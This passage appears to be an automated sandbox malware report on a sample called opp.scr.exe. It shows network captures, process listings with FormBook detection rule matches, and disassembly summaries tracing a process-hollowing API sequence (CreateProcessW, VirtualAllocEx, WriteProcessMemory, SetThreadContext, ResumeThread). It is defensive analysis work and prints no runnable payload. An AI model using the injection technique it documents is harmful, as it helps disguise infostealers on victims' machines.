                                                            Connection: close
                                                            Alt-Svc: h3=":443"; ma=93600
                                                            X-CDN-TraceID: 0.57ed0117.1714658195.914b951


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.54972952.165.165.26443
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:57:14 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vPOR2YTmsL7R8cO&MD=bTcn1Cz5 HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                            Host: slscr.update.microsoft.com
                                                            2024-05-02 13:57:14 UTC560INHTTP/1.1 200 OK
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Type: application/octet-stream
                                                            Expires: -1
                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                            ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                            MS-CorrelationId: fffea00a-7eac-49ea-9aa9-1b3c1d0498ac
                                                            MS-RequestId: 4894f5e6-d4b6-4587-8980-b64a0a074af3
                                                            MS-CV: 71WoOZbHREO7dwhc.0
                                                            X-Microsoft-SLSClientCache: 2160
                                                            Content-Disposition: attachment; filename=environment.cab
                                                            X-Content-Type-Options: nosniff
                                                            Date: Thu, 02 May 2024 13:57:13 GMT
                                                            Connection: close
                                                            Content-Length: 25457
                                                            2024-05-02 13:57:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                            Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                            2024-05-02 13:57:14 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                            Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:15:56:11
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\opp.scr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\opp.scr.exe"
                                                            Imagebase:0xd60000
                                                            File size:563'200 bytes
                                                            MD5 hash:F7C26F0B2088E0324B019C534686B257
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.1993109021.00000000057D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:15:56:12
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\opp.scr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\opp.scr.exe"
                                                            Imagebase:0xa70000
                                                            File size:563'200 bytes
                                                            MD5 hash:F7C26F0B2088E0324B019C534686B257
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:15:56:16
                                                            Start date:02/05/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                            Imagebase:0x7ff715980000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:5
                                                            Start time:15:56:17
                                                            Start date:02/05/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1940,i,10687501719211606552,13801376808827217908,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff715980000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:8
                                                            Start time:15:56:41
                                                            Start date:02/05/2024
                                                            Path:C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe"
                                                            Imagebase:0x220000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:9
                                                            Start time:15:56:43
                                                            Start date:02/05/2024
                                                            Path:C:\Windows\SysWOW64\dfrgui.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\dfrgui.exe"
                                                            Imagebase:0x740000
                                                            File size:97'280 bytes
                                                            MD5 hash:1167953AFDD83E704CE79B8814E54D69
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:15:56:59
                                                            Start date:02/05/2024
                                                            Path:C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe"
                                                            Imagebase:0x220000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:12
                                                            Start time:15:57:15
                                                            Start date:02/05/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:21
                                                              Total number of Limit Nodes:1
                                                              execution_graph 12037 171a600 12038 171a64c WriteProcessMemory 12037->12038 12040 171a6e5 12038->12040 12017 171a878 12018 171a8bc ResumeThread 12017->12018 12020 171a908 12018->12020 12021 171b878 12022 171b8d6 12021->12022 12023 171b8eb Wow64GetThreadContext 12021->12023 12022->12023 12024 171b934 12023->12024 12025 171b558 12026 171b5e5 CreateProcessW 12025->12026 12028 171b73e 12026->12028 12029 171a758 12030 171a79c VirtualAllocEx 12029->12030 12032 171a814 12030->12032 12033 171a4d8 12034 171a521 Wow64SetThreadContext 12033->12034 12036 171a599 12034->12036 12041 171b988 ReadProcessMemory 12042 171ba47 12041->12042

                                                              Executed Functions

                                                              Function 0171B558 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 45 171b558-171b5e3 46 171b5e5-171b5f7 45->46 47 171b5fa-171b608 45->47 46->47 48 171b60a-171b61c 47->48 49 171b61f-171b65b 47->49 48->49 50 171b65d-171b66c 49->50 51 171b66f-171b73c CreateProcessW 49->51 50->51 55 171b745-171b804 51->55 56 171b73e-171b744 51->56 66 171b806-171b82f 55->66 67 171b83a-171b845 55->67 56->55 66->67
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0171B729
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991393119.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1710000_opp.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: ef2216d9ee8b39bde0f01002dbd593dbedf42990cca9fa0c75d037a51642a19a
                                                              • Instruction ID: e906d29ab3d85a4bd2814b64c1ca44d6070c5a71682bfefebf9bc5aeb6f0a80b
                                                              • Opcode Fuzzy Hash: ef2216d9ee8b39bde0f01002dbd593dbedf42990cca9fa0c75d037a51642a19a
                                                              • Instruction Fuzzy Hash: 7E81C3B4D00219CFDB21DFA9C880BDDBBF5BB49300F1495AAD509B7210DB30AA89CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171A600 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 71 171a600-171a66b 73 171a682-171a6e3 WriteProcessMemory 71->73 74 171a66d-171a67f 71->74 76 171a6e5-171a6eb 73->76 77 171a6ec-171a73e 73->77 74->73 76->77
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0171A6D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991393119.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1710000_opp.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 22c531e76a6082709c3359129d473144aeb1f12c5a59bdb02e12b2181fe7acc7
                                                              • Instruction ID: 08934c0ced27a03c4cded63a884ca61a666c33ab44d84383a914dda702ff5ab2
                                                              • Opcode Fuzzy Hash: 22c531e76a6082709c3359129d473144aeb1f12c5a59bdb02e12b2181fe7acc7
                                                              • Instruction Fuzzy Hash: 7A41A8B5D012589FCF00CFA9D984AEEFBF1BB49310F20942AE819B7200D735AA45CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171A758 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 82 171a758-171a812 VirtualAllocEx 85 171a814-171a81a 82->85 86 171a81b-171a865 82->86 85->86
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0171A802
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991393119.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1710000_opp.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 0ff955b1e8671e50df929a9fd2dbedff4b6baeadc00e6aa3fd8b3defe48284f2
                                                              • Instruction ID: e5db265114e6b1bfcff28769e44eef489aede9858443a6917846bdf8424c7616
                                                              • Opcode Fuzzy Hash: 0ff955b1e8671e50df929a9fd2dbedff4b6baeadc00e6aa3fd8b3defe48284f2
                                                              • Instruction Fuzzy Hash: 3331A7B9D002589FCF10CFA9D984ADEFBB1BB49310F10A42AE819B7310D735A906CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171B988 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 91 171b988-171ba45 ReadProcessMemory 92 171ba47-171ba4d 91->92 93 171ba4e-171ba8c 91->93 92->93
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0171BA35
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991393119.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1710000_opp.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: ec91d1b0e348fecfe67c404d5686a78fee9726fe9a8d9dae9a234bc0ecb38572
                                                              • Instruction ID: 965eed038efec2017a69ba8f56b33b9c2ce1243fa12f010c222b5f86e150697c
                                                              • Opcode Fuzzy Hash: ec91d1b0e348fecfe67c404d5686a78fee9726fe9a8d9dae9a234bc0ecb38572
                                                              • Instruction Fuzzy Hash: 803176B9D04258DFCF10CFAAD984ADEFBB5BB09310F10A02AE814B7210D335AA45CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171A4D8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 96 171a4d8-171a538 98 171a53a-171a54c 96->98 99 171a54f-171a597 Wow64SetThreadContext 96->99 98->99 101 171a5a0-171a5ec 99->101 102 171a599-171a59f 99->102 102->101
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0171A587
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991393119.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1710000_opp.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: f817e89c88b8211b63f0786f6b1768cc1d7085715fc412958a0c01f83938b5d3
                                                              • Instruction ID: ecd416f20577fb7622c8c77ffcbb6469ba04c507c4533d71dda3b3fd2fadec8c
                                                              • Opcode Fuzzy Hash: f817e89c88b8211b63f0786f6b1768cc1d7085715fc412958a0c01f83938b5d3
                                                              • Instruction Fuzzy Hash: 6B31BBB5D012589FDB10CFAAD884AEEFFF1BB49310F24802AE419B7240D738A945CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171B878 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 107 171b878-171b8d4 108 171b8d6-171b8e8 107->108 109 171b8eb-171b932 Wow64GetThreadContext 107->109 108->109 110 171b934-171b93a 109->110 111 171b93b-171b973 109->111 110->111
                                                              APIs
                                                              • Wow64GetThreadContext.KERNEL32(?,?), ref: 0171B922
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991393119.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1710000_opp.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 75ee6fde95b09234c34dd41cc9ae15c164751c65992807184172434807524c7d
                                                              • Instruction ID: 36591f35061abc7fc6bb581c58a4ccc21c6699d83a24963c4e349492fa982ce6
                                                              • Opcode Fuzzy Hash: 75ee6fde95b09234c34dd41cc9ae15c164751c65992807184172434807524c7d
                                                              • Instruction Fuzzy Hash: 593188B5D012589FDB10CFAAD984ADEFBF1BB49310F24906AE418B7210D379A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171A878 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 114 171a878-171a906 ResumeThread 117 171a908-171a90e 114->117 118 171a90f-171a951 114->118 117->118
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0171A8F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991393119.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1710000_opp.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 3bde5f4b4b13ba0be5631151fd4f5dfc6fb49314b1de1ba754a6c5e18705f9b6
                                                              • Instruction ID: 835477ba7b31b423090f8c7fa0f3c6b002d5331b467fa016f3c2d54668ee8f72
                                                              • Opcode Fuzzy Hash: 3bde5f4b4b13ba0be5631151fd4f5dfc6fb49314b1de1ba754a6c5e18705f9b6
                                                              • Instruction Fuzzy Hash: 2631CAB4D112589FCB14CFAAD884A9EFBF5BF49310F10942AE819B7300C735A941CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BD2F0 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 182 16bd2f0-16bd302 183 16bd399-16bd3a0 182->183 184 16bd308 182->184 185 16bd30a-16bd316 183->185 184->185 186 16bd31c-16bd33e 185->186 187 16bd3a5-16bd3aa 185->187 189 16bd3af-16bd3c4 186->189 190 16bd340-16bd361 186->190 187->186 194 16bd37b-16bd383 189->194 192 16bd369-16bd379 190->192 192->194 195 16bd3d1 192->195 196 16bd3c6-16bd3cf 194->196 197 16bd385-16bd396 194->197 196->197
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990932098.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_16bd000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a133c6befa6cc0ca36ac066509cca9add59c013b4d5bb4995a984779cfaf4874
                                                              • Instruction ID: 92c9f2424b2f891d760f5d15519f7b958d7d7c6835397519274c48de61ea6793
                                                              • Opcode Fuzzy Hash: a133c6befa6cc0ca36ac066509cca9add59c013b4d5bb4995a984779cfaf4874
                                                              • Instruction Fuzzy Hash: C12133B1604200EFDB05DF98DDC0B6ABF65FB88318F24C569E9094E247C33AD496CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BD5B8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 199 16bd5b8-16bd5ca 200 16bd65e-16bd665 199->200 201 16bd5d0 199->201 202 16bd5d2-16bd5de 200->202 201->202 203 16bd66a-16bd66f 202->203 204 16bd5e4-16bd606 202->204 203->204 206 16bd608-16bd626 204->206 207 16bd674-16bd689 204->207 209 16bd62e-16bd63e 206->209 211 16bd640-16bd648 207->211 209->211 212 16bd696 209->212 213 16bd68b-16bd694 211->213 214 16bd64a-16bd65b 211->214 213->214
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990932098.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_16bd000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40abfc842461a21392f699db5bf67aa76351648ed0274471fcc54269451676b3
                                                              • Instruction ID: e976611e01438cb0f9ecf586b642d61357c2c10703aa2353ee207de5b8a6798c
                                                              • Opcode Fuzzy Hash: 40abfc842461a21392f699db5bf67aa76351648ed0274471fcc54269451676b3
                                                              • Instruction Fuzzy Hash: 322100B2504204EFDB05DF98D9C0B66BFA5FB98318F248569E90A0F246D336D496CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BD2EB Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990932098.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_16bd000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                                              • Instruction ID: 70cecf218105e9826c1a0aff8fef37214b246a810072847f9b9da1c455810541
                                                              • Opcode Fuzzy Hash: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                                              • Instruction Fuzzy Hash: 5621CD76504240CFDB06CF44D9C4B5ABF62FB84314F24C5A9D9090A657C33AD46ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BD5B3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990932098.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_16bd000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction ID: 8285805c8a41b5ecb5b08b2442c382f7b5aa8157e25817f87f77a2be8ba7fee5
                                                              • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction Fuzzy Hash: 6F11DF72404240CFCB02CF54D9C4B56BF61FB94318F2486A9D9090B257C33AD49ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:1.3%
                                                              Dynamic/Decrypted Code Coverage:2.6%
                                                              Signature Coverage:14.7%
                                                              Total number of Nodes:266
                                                              Total number of Limit Nodes:28
